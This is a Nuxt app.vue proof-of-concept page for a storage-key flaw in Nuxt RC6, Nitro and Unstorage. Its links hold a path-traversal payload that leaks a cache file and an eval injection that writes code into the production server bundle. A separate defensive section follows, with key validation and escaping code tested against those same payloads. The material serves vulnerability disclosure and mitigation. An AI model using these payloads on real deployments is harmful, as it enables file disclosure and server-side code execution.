app.vue
<template>
  <div>
    Nuxt RC6, Nitro 0.4.12, Unstorage 0.5.5 Exploit
    <ol>
      <li>
        <NuxtLink to="/api/bryce" target="_blank"
          >Try this link, you can see my name!</NuxtLink
        >. If you explore the .nuxt/cache folder you'll find the cached file.
      </li>
      <li>
        <NuxtLink to="/api/..:..:..:..:..:..:public:test" target="_blank"
          >Try this link.</NuxtLink
        >
        then
        <NuxtLink to="/test.json" target="_blank">this link.</NuxtLink> You've
        leaked a cache file!
      </li>
      <li>
        <!-- We need to use :server:assets because Nuxt's assets directory is special.-->
        <NuxtLink
          to="/api/..:..:..:..:..:..:server:assets:'+eval('console.log(`hacked!`);`blah`')+'"
          target="_blank"
          >Try this link.</NuxtLink
        >
        then run a production build (make sure you're on linux).
      </li>
      <li>
        Have a look at the ./output/server/chunks/nitro/node-server.mjs file.
        Look for "const _assets = {"
      </li>
      <li>Run your new build!</li>
    </ol>
  </div>
</template>
<script setup>
const demo = async () => {
  const { data } = await useFetch('/api/cached');
};
</script>
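
The steps in the template above rely on a `:`-separated storage key being turned into a file path without validation, and on a stored key later being written into generated source. The block below is an added defensive example, not code from this repository, Nitro or unstorage: `safeKeyToPath`, `assetLiteral` and `check` are hypothetical names, and it assumes the URL segment after `/api/` is used as the storage key.

```javascript
// Added example: safeKeyToPath, assetLiteral and check are hypothetical names,
// not part of the Nitro or unstorage API.

// A segment is rejected if it is "." or "..", or contains "/", "\" or NUL.
const BAD_SEGMENT = /^\.{1,2}$|[\/\\\0]/;

// Map a ':'-separated storage key to a relative path, or throw.
// Because every segment is validated, the joined path cannot leave
// the directory the caller appends it to.
function safeKeyToPath(key) {
  if (typeof key !== 'string' || key.length === 0) {
    throw new TypeError('storage key must be a non-empty string');
  }
  const segments = key.split(':');
  for (const seg of segments) {
    if (seg === '' || BAD_SEGMENT.test(seg)) {
      throw new Error(`invalid storage key segment: ${JSON.stringify(seg)}`);
    }
  }
  return segments.join('/');
}

// Emit a key as a JavaScript string literal for generated source.
// JSON.stringify escapes quotes, backslashes and control characters;
// U+2028 and U+2029 are escaped as well for older JavaScript parsers.
function assetLiteral(key) {
  return JSON.stringify(key)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Non-throwing wrapper, convenient for logging rejected keys.
function check(key) {
  try {
    return { ok: true, path: safeKeyToPath(key) };
  } catch (err) {
    return { ok: false, reason: err.message };
  }
}

// Constructed inputs: the key shapes produced by the three links in the template.
const samples = [
  'bryce',
  '..:..:..:..:..:..:public:test',
  "..:..:..:..:..:..:server:assets:'+eval('console.log(`hacked!`);`blah`')+'",
];
for (const key of samples) console.log(assetLiteral(key), check(key));
```
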